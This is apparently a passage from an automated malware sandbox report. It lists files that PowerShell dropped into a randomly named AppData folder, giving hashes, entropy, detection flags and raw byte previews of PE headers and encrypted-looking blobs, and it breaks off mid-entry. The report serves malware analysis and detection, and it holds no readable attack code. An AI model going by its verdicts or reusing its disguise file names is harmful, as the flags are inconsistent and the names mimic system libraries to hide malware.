Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l\|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\msvcp100.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	421200
Entropy (8bit):	6.59808962341698
Encrypted:	false
SSDEEP:	12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:	03E9314004F504A14A61C3D364B62F66
SHA1:	0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:	A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:	2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\msvcr100.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	770384
Entropy (8bit):	6.908020029901359
Encrypted:	false
SSDEEP:	12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:	67EC459E42D3081DD8FD34356F7CAFC1
SHA1:	1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:	1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:	9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..\|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...\|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\nmprwjs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	806258
Entropy (8bit):	7.906166713118734
Encrypted:	false
SSDEEP:	24576:vcDLRkUOlnsUShXxDAv/FVjMrVB0TZKOf3hl2uNgTu4K:v6af+hXWv/fYrcZF2n8
MD5:	7AB8EF9419F402C83E0CD0346D9A1A67
SHA1:	CAA661BE7346C474DE569B19B09507C58A6F7D10
SHA-256:	4EC0EEF7CE80B0181DBF5D946C7A2D40067B9BF89292B27F7496482E2F7A80A1
SHA-512:	AACD71428A25ABB693B5E3773C94B595D659ACE9894448E733809ECFACD3E1F066B1AE4BC8D477C8B112FCFF44FD7F3A20E0A1FD39C8D7A7D199CE330C971C9D
Malicious:	false
Preview:	.....CU...DBMn..UDF...nN.]A.^..qo.Yft.A...libK..QBGi.S.......W.heeO...lty.v.rp.wl...N...Wdg.e....OmP..ZC....sV.O.m.Y.G...A..fH......._..O.ordH.W.A..A.Ewt.o.XI.A...^.gmbZs.ln.....TC..DM.R_N\....`..LB.[]Qs.vj..WN.gSVd_...p.h.Y`t..`...y.q..T.......J.XrmGy......Mq_\.Q..X.....R..d]..n.N..iL....bH^rqW..aS..g.t.].Gft........A.t.....k.jn.TL......L.aP]H.ppRNAr........._.U._ru.xvU..h\b..g.u.s.lhn..V_k...X.n...E......Wteb.pS\..Mrg...._.....neu.....]A..i[...uh...JE..........c.QVUCpgf.qM.X..Q]r[.a..vb.qLa.BT.jR.N.Z.Rd.Zy.ojPL.g..I....rlt.gH....VDGwgWi.M[I.w.fR...khW.QE..flDkK.sI..C.Eg.k..Nj..B^tl....A..i.\._vd....LlM......W..thSi...lU....N.l..mw..D.M....V.j.P`..YAfSX.]g.V.l.ir.XoF^o.hp.J\.Br.C`AO.ZhNHG.....Uyc..Uh...C..H.gw.L.I......o....\.E...WMh.[j.CP.U.ZK..P.....AFsw....Nusg.Vj.Rgu..k..^ds..Y.a.Kns.[w.V.o...vNg.[gBY....UHr.g.E.Yc..nsY.k..YE..q.udOO..T.EJ...M.xrS..\....b.b.i....D.d.H.PrHygWX]WkuNCdLjj.r.R.....f.[.......P.f....fRp.LPVSR......\M.g._.EFj.`BCr_^HO.N..d.rC.d.c^...`J.gTG.h.k.R.......u^

C:\Users\user\AppData\Roaming\QHUPRmIp\opengl64.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18578896
Entropy (8bit):	6.451339218330448
Encrypted:	false
SSDEEP:	393216:PXhbUNnoBP98OQ//aXUszfTBHCOUZ2UenCDkOH2:PXhNB4nlW
MD5:	0A84667145E7EFEF026C888D4B768126
SHA1:	27673E1BD7C55BBA6EAA37620D3B3820CE45D46A
SHA-256:	DD575F3C64382193610815909BD2C52490244ECBBB9BBA6EEF5FE4F0BB43BB4D
SHA-512:	3E964C996ED358787C4DFDB965A00B38B4118C804AE1BF8D32AEB7D936584E72C188E3FA0D27D1C2FFD3BE13DCA8045B08B28B15070812C195D82D1BF23A2604
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hX2.,9\.,9\.,9\.%A.49\.wQY.-9\.....+9\..TX.&9\..T_.'9\..T].9\.wQX.)9\.wQZ.(9\..TY..9\.CO.-9\..k..(9\.wQ]..9\..PY.e9\.C]Z.-9\.@QX.9\.C]]."9\..gX.\9\..PX..;\.CO../9\.,9].T:\..gY.t8\..PY.'9\..PY.)9\.,9\.49\..WY.k9\..W\.-9\..W..-9\.,9.-9\..W^.-9\.Rich,9\.................PE..d...K..d.........."...........r......S.........@..........................................`.................................................<...p....P,.xh....#.,....D...9....,.$... '..T...................x'..(...0...................@...L...@....................text............................... ..`.uedbg..0........................... ..`.rdata....=.......=.................@..@.data.....)..@......................@....pdata..,.....#.....................@..@_RDATA...#... ,..$..................@..@.rsrc...xh...P,..j...&..............@..@.reloc..$.....,.....................@..B................

C:\Users\user\AppData\Roaming\QHUPRmIp\ovaw

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	23929
Entropy (8bit):	5.330958085264417
Encrypted:	false
SSDEEP:	384:JnIPeydeXXzYaZ0FHB59U/yFoPIEci76d5E/SboBVBxtuMPVkFt4uayvN:JImyyzrZ0z59U/+UIEci7QaSqVBxDuvN
MD5:	90284F3D3121827201D9233A4D7CD97D
SHA1:	0DFF5C2B5AA628D7800B6FB163F7BE7948229AF5
SHA-256:	2C373D4495AA2E52A9F27039998BB42F3A5139929EC8D8E8963C30D3F558CC57
SHA-512:	DCD9C837F38970D1DD5336732ED42FA2524791C23E6410018E9E149FBD6EE584101B951F851418CA522E571A775E34EE4F45786DDDB33340FC67EF1BD1C4DB64
Malicious:	false
Preview:	.I_aB.Q...i......_Q......bi.....cf.......x_c....Kq....e^E..TI.HN..B.W.WSwrg..R..QC_.T..XNG.n.vO...Zl...Gn.tU.N.H......nbBrv.ZQ.ZXUq.D.aJkFf.Wh....U...Vl.dCb.G..u.f.._Z.E..l.ZEJDyE..S.V...w.LOp][B...l.f...ydFF.An.......PVMj..pI.oV.Y.uR.K..R.[ml..i..v.av.q.QD.sI...dyA...Z..C.DB...ITXu.eW..pc...u.XF\DAYsuJ.LvFHV....w.P..OIO^...Zi..E...El...UQt.C....\..W.VCsT.F..mq.l.i]...I.cZFr.._.ctvi..L.Y...g..MK.dG...FdmA...tNN..x..a.u........r..F....nN_h.eLu.a.Rd`v.NP.ElV.Qg.Zos.L.q_.u.d..PV...^...V.C..l..XON.P.kU.UNJ..Ph..etWj..J...o_.k........rB.[.edW.Gof\NcLjk.W.D.]...VK...A.A.T.p.egk...l.[G..Y.IV.vo..e....YVkuPX...v.U....XUXN.sRu...J..ZX..\.ZQ.U...mh]x..Qh_lb.R.U\.vD._cFd....ijX..Q.......D..QR.S....jMP.m.]bn...r......FsQX......n...].eD]...ygD..bgv..gs..bj.yE...F.C......HG..o..s......RiZBAJ............w.J...Ne.^y.fl..uF.....xf.R..g.Q.mQ.X.k...iUJ......SK.F..dp.W.[Cy.j...c...Px.R.O[.x..YxnPV\P.R.XV._Xf.i.Ue......pk..e.u`k.pf.hY.]Du..a....Xu...G.do..YH......^.An[.X..`.biJGGK..mR...t...t..mm.[.M.N.r.p

C:\Users\user\AppData\Roaming\QHUPRmIp\updater\manager\ks_tyres.ini

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	10077
Entropy (8bit):	4.973640153352507
Encrypted:	false
SSDEEP:	192:oqCaCVsP1MQzeRO11bvR2hpg6iYRkX+DHj5jkZU3KAg/sVfKPPfYqlwvR:9bf1MQzeRA1TR2hpg6iY+X+SuaAg+zqW
MD5:	47F6571C7884DA6C743551AC724186D4
SHA1:	C338CE7D292C78F420876332DE93684102EC04AC
SHA-256:	894D3C57598ECB22C769CC3EA8219859A95E22740E72394A474012EA2119B3D9
SHA-512:	5CF57F3F2C53FCBEDF44CD2C896008C41607D7583045E37B819DA1B1D3CE26073802E73FAB74EA6DEF035F11A256D9F0D11A87991CEA14EF5BAF67BDA21D6E20
Malicious:	false
Preview:	README=Insert your mod's data in mod_tyres.ini....[abarth500]..ST=Street..SM=Semislicks....[abarth500_s1]..ST=Street..SM=Semislicks....[alfa_romeo_giulietta_qv]..ST=Street....[alfa_romeo_giulietta_qv_le]..ST=Street....[bmw_1m]..ST=Street..SM=Semislicks....[bmw_1m_s3]..ST=Street..SM=Semislicks....[bmw_m3_e30]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e30_drift]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e30_dtm]..S=Slicks Soft DTM90s..M=Slicks Medium DTM90s..H=Slicks Hard DTM90s....[bmw_m3_e30_gra]..S=Slicks Soft DTM90s..M=Slicks Medium DTM90s..H=Slicks Hard DTM90s....[bmw_m3_e30_s1]..SV=Street 90s..ST=Street..SM=Semislick....[bmw_m3_e92]..ST=Street..SM=Semislicks....[bmw_m3_e92_drift]..ST=Street..SM=Semislicks....[bmw_m3_e92_s1]..ST=Street..SM=Semislicks....[bmw_m3_gt2]..SS=Slick SuperSoft..S=Slick Soft..M=Slick Medium..H=Slick Hard..SH=Slick SuperHard....[bmw_z4]..ST=Street..SM=Semislicks....[bmw_z4_drift]..ST=Street..SM=Semislicks....[bmw_z4_gt3]..S=Slick Soft..M=Sli

C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdisps.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11656736
Entropy (8bit):	7.0395123103843105
Encrypted:	false
SSDEEP:	98304:XNTNmlyn5aaKgwF2MxtrjgEe2eVivataUN3Dumf/S+CJ4RoLERm6iVv/lraqXtxG:XNT8lxjVWiCwUN3d/RbCv/9tx/KLce3
MD5:	DA3E5ECDA1487FDBCC6D7DB314815696
SHA1:	B2775D5A94A2AF489590E1544DBFF7176C39D389
SHA-256:	77173B4B61B59ECA507CA3ECE87A77A87E4E77A48DD162BA813D61CB0513421D
SHA-512:	CB3A14DBB15FAD5BEE97F3EC2236C7946778B1C884B38086026029F1BBBF20648E420BD829A82B8796F420EE50A5EF896BDC9AACCC67B82AC4E89EB67294C656
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........\|x...+...+...+.....+f.....+.....+......+......+......+.....+.....+...+...+.....+......+......+..P..+......+......+......+......+...+...+..+...+...*...+Rich...+........................PE..d......e.........." .....4=...u.......4...................................... ............`A..........................................S.....t.S.T.....Z.H.W...W.t....... N......``....I.T.....................I.(.....G..............P=.H...x.S......................text....3=......4=................. ..`.rdata.......P=......8=.............@..@.data...,....0T.......T.............@....pdata..t.....W.......U.............@..@.didat........Y......rX.............@....tls..........Y......\|X.............@....rsrc...H.W...Z...W..~X.............@..@.reloc..``.......b..................@..B................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdispsr.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11575304
Entropy (8bit):	6.353056088317284
Encrypted:	false
SSDEEP:	98304:0lRaeidue2eFivataUN3Demf/S+CJ4RoLEROyiev/lraqXtx/SzLce3hNc:+CliCwUN3d/Rb5v/9tx/KLce3hNc
MD5:	D74D7DCA89D97BC912A376A5C34172B1
SHA1:	6420073AB703884DBACD499C1B7174F858E2068C
SHA-256:	0681D4E92B84D238B3E3FB118B0A359BE1ABA83528B94F7FDE2D9101D8163417
SHA-512:	3E4A308794B05B9EB99902367ED8916A590316261175B02DD35007FABD900D715625E48AA0D5B5518F02550B0B678EB7EF83DC96F68632D93D21378351D82F2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...s...s...s.......r...s...r.......r...Richs...................PE..d...L..e.........." .........P...............................................p...........`.......................................................... ...M...........T...L..............T............................................................................rdata..T...........................@..@.rsrc....M... ...N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvptxJitCompiler32.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17375864
Entropy (8bit):	6.708942481712103
Encrypted:	false
SSDEEP:	196608:LeXcR+Vei+lHBfL90NUIE4/pp1D84she84lt7Hpml9DCqIsXC:Q5+7j9SG4lw4HDltLknc
MD5:	3EA5205D6831DDC3670AB8EEACB853F5
SHA1:	DADB303E031089535EA01C8A10D89C1033A5D7A4
SHA-256:	CAA6AE6C505E54875761443171C229ED367B2E51E448A9034B81BE062B961847
SHA-512:	5E7118D3DB968D30F7020FB5A3E4373ACD1572EB7736F55229D1ABA836E43B755CFF2D78E7BD22DAEBEC5A53BBCF7EAF00A0A5D233BC6679C36675A03BC1B36B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O..............J......J......J........[............F......F......F......F.....F..-...F......Fo.....F......Rich....................PE..L......e...........!..........N.....h.....................................................@.....................................(.......................xL...... ...................................0...@............................................text............................... ..`.rdata...TG......VG.................@..@.data...(.... ......................@....rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x64\trading_api64.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	289568
Entropy (8bit):	6.327940956070683
Encrypted:	false
SSDEEP:	6144:Aa0EKzmilQBrUssevOkHcAxilMrCynC0bcLd1x:B0EZbr3se1SynC9x
MD5:	2BCA4E2C047EC969CB3CFF277E7FC184
SHA1:	C4B5B00B605E59C6FDCB6731F2E53069506E287A
SHA-256:	F1EB582E607A1E43CDB1654BFB7CB29AD46F6728B3FB89A14F7727E0E8DAAB69
SHA-512:	3819178EC650298157B1D67317E0895CB92709B106D0D8525921E341EBA5E960F42434E010066BB405F1BA1619ADFF1A645EDE58E16C4B2D88DF2C90611A6CB5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@.......................................VLV......P... :].........!.l..._.. m:....CpL0f..41PC....1.....S7a.../....."....F..~........)...2R..@../..-....1..tP..JS.&...W\|P..k+s..e.................................................................PE..d.... :].........." .....4..........$.........@;..........................................`........................................../..`.......P............`...#...P.. .......t...@...T.......................(....................P...............................text....3.......4.................. ..`.rdata......P.......8..............@..@.data....I..........................@....pdata...#...`...$..................@..@.rsrc................>..............@..@.reloc..t............F..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x64\tradingnetworkingsockets.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4249928
Entropy (8bit):	6.705198671596974
Encrypted:	false
SSDEEP:	49152:kGtlqhcIU6ilVwASObX9F+LWDumqrJjAZVT4kmrqEUAYVxkG3q+XRQsmqkALD4z4:M+dl7+8z1mqkA8lv0bH1bBGZZs
MD5:	3CF26CE759C5E261FE3ECC6451B8B08E
SHA1:	B5DA110034FE394A4020367404534903764473FE
SHA-256:	FC4A65FF603BF1F4BFE323DE1866145AE1E006AA656799FD134DFA63D92D47C1
SHA-512:	E7B543483F38BB6338490B5C8F5DA6F95E0D78B45F2B26D898CC3B58CF7C359952BFE413414CB6CD1532C3C6FD7A860026B2BEC7B6D0DDFBEE9A1385A62E14F2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...VLV.......@....b9S.....b1s..Q>.>..xD.E..4...p.=...0?.8O..H".Hu...P.z.v.T ^..Nb......$o..n.o....G......[....k9.ZgH.wq..r7.B..:.....p..Q.........................................................................................PE..d......b.........." .....T/...........,......................................pA.....}.A...`..........................................+=.(....1=.......@.x.....>.H.....@.H-....@.xy..xC:.T....................E:.(....C:.8............p/..............................text....S/......T/................. ..`.rdata.......p/......X/.............@..@.data...$`...P=......,=.............@....pdata..H.....>.......>.............@..@_RDATA........@......$@.............@..@.rsrc...x.....@......&@.............@..@.reloc..xy....@..z...2@.............@..B................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18384
Entropy (8bit):	7.060392296328683
Encrypted:	false
SSDEEP:	384:WRtwDfIe9jWfhWC+Y3DGk8ZpH3GCJErra8o7Q+Y3DGUKn8JN77hhET:ape9A5DGkiRBEXaR70DGa3hqT
MD5:	29001F316CCFC800E2246743DF9B15B3
SHA1:	DC734266648D3463C1F8D88C1CE7D900A4E3B26C
SHA-256:	E5EA2C21FB225090F7D0DB6C6990D67B1558D8E834E86513BC8BA7A43C4E7B36
SHA-512:	4CFFC0C6F94FCD1155909993C622B9103ABD7A7BCE88742A10ABD6A3496A334D667A39BB601F99EB174AA847D7DAE056E0D9769754CA86320579B262A20A6599
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...I............." .........................................................0......K.....`.........................................`................ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17360
Entropy (8bit):	7.138145958834492
Encrypted:	false
SSDEEP:	384:WiIWfhWx+Y3DGk8ZpH3GCJErcx3l/r7+Y3DGU78JN77hhC6UHR:doDGkiRBEWV/rxDGT3h06UHR
MD5:	6EE66DCA31C5CCE57740D677C85B4CE7
SHA1:	8969DB03F98F9548CAF8E2D8C7F2F5CD7071F333
SHA-256:	D00A0EDACE14715BF79DBD17B715D8A74A2300F0ADB1F3FC137EDFB7074C9B0A
SHA-512:	592E3B6C689A0D6C87079C54C3E13E6EE1FC0C5C770ABC854040E85464687C46F0A558BE22F8759DBC4A100810386EE379FFE4359CF9091D9AFAE548BC597BE2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...xc.].........." .........................................................0......b.....`.........................................`................ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18384
Entropy (8bit):	7.019765652631857
Encrypted:	false
SSDEEP:	384:WCGeVxWfhWD+Y3DGk8ZpH3GCJErYtN+Y3DGUO8JN77hhTew:3GeVmyDGkiRBEojDGa3h9ew
MD5:	0069FD29263C0DD90314C48BBCE852EF
SHA1:	DFB99C850A69E67E85F0A0985659F325BD8F84FC
SHA-256:	D11093FDC1D5C9213B9B2886CE91DB3DED17EF8DAE1615A8C7FFBC55B8E3F79B
SHA-512:	71965E8DD2FD81D0C6DBA4DBEC8D2D1BFD4A644EF6BBA4F6027DE4BCDF9C07DA16F27F2156C21B52E678C75F0A93A4BCBC3E1942F0A73F1EEA5FF64B70662F70
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...L.\w.........." .........................................................0.......t....`.........................................`................ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17872
Entropy (8bit):	7.081667069114702
Encrypted:	false
SSDEEP:	384:W4yMv9WfhWx+Y3DGk8ZpH3GCJEr4ey/+Y3DGU888JN77hhnY1:DyMvaIDGkiRBEsnDGX3hxY1
MD5:	2E5C29FC652F432B89A1AFE187736C4D
SHA1:	96F8480B9339411D5D8C94918E983523B1A55C56
SHA-256:	3807DB7ACF1B40C797E4D4C14A12C3806346AE56B25E205E600BE3E635C18D4F
SHA-512:	FE1135532E18127F2CFEFAAA4A19020D6C790374F648DC93383D58EE52B147D1451AF01B8624234BD5D77ABE2451EB3E15CBE72A19D283F00CF78C05C43041DF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0......s.....`.........................................`................ ...................9..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.982364402821961
Encrypted:	false
SSDEEP:	384:Wjdv3V0dfpkXc0vVaCWfhWt+Y3DGk8ZpH3GCJErHZpn+Y3DGUrUN8JN77hhYl:Wdv3VqpkXc0vVabkDGkiRBEtplDGEUq8
MD5:	979C67BA244E5328A1A2E588FF748E86
SHA1:	4C709CE527550EB7534CB6362AFDB3623C98254E
SHA-256:	8BB38A7A59FBAA792B3D5F34F94580429588C8C592929CBD307AFD5579762ABC
SHA-512:	49F3C3319AA462B445C6A0B816E10034F6E5A9CF1250EA30B348CFA1EF71525E9F62E2F13253F61375F51FC574847DE0D509CFFA95103771BE356327D5FEF90D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0.......K....`.........................................`...X............ ...................9..............T............................................................................rdata..X...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18384
Entropy (8bit):	7.088266400086267
Encrypted:	false
SSDEEP:	384:WHtZ36WfhW8+Y3DGk8ZpH3GCJEFxMDD+Y3DGEC8q8JN77hhFGT:EbDGkiRBEsJDGS13hj+
MD5:	659E4FEBC208545A2E23C0C8B881A30D
SHA1:	11B890CC05C1E7C95F59EDA4BB8CE8BC12B81591
SHA-256:	9AC63682E03D55A5D18405D336634AF080DD0003B565D12A39D6D71AAA989F48
SHA-512:	010AB6D3971FABD2A956F891B8D9D20EF487E722443B2882A1A329830DC5C80D262E03A844CD3F5C3E4EFCFBAD72B9E1FBBF7D9DC6CF85ED034D84726946CE07
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`...x............ ...................9..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18896
Entropy (8bit):	7.013421195915214
Encrypted:	false
SSDEEP:	384:WBTnWfhWt+Y3DGk8ZpH3GCJEFxqIDh/h+Y3DGER6vJ8JN77hhHWT:0TsIDGkiRBE+IxfDGM6vW3h5WT
MD5:	CEF4B9F680FAAE322170B961A3421C5B
SHA1:	DD89A2D355DF989BBD8648789472BFE9C14AFCD5
SHA-256:	1FE918979F1653D63BB713D4716910D192CD09F50017A6ECB4CE026ED6285DF9
SHA-512:	F56617290D4AC25231631D708A6C8B003BDD358BAE9672F7DEE539A96B292C13E04C65BA5F05937C52F73288EB3DD7CBA479ED030942A0D9D3A15512548FA4A9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...hI$..........." .........................................................0............`.........................................`...H............ ...................9..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18384
Entropy (8bit):	7.0823956037120475
Encrypted:	false
SSDEEP:	384:WGOWfhWc+Y3DGk8ZpH3GCJEFxi+3T7Tu+Y3DGEu8JN77hh2KI:5XDGkiRBEm+uDGQ3h7I
MD5:	69DF2CCE4528C9E38D04A461BA1F992B
SHA1:	BB1D0DA76CF696ACF2E0F4E03E6D63FBAD4325AA
SHA-256:	A108A8F20DED00E742A1F818EF00EB425990B6B24A2BCD060DEA4D7F06D3F165
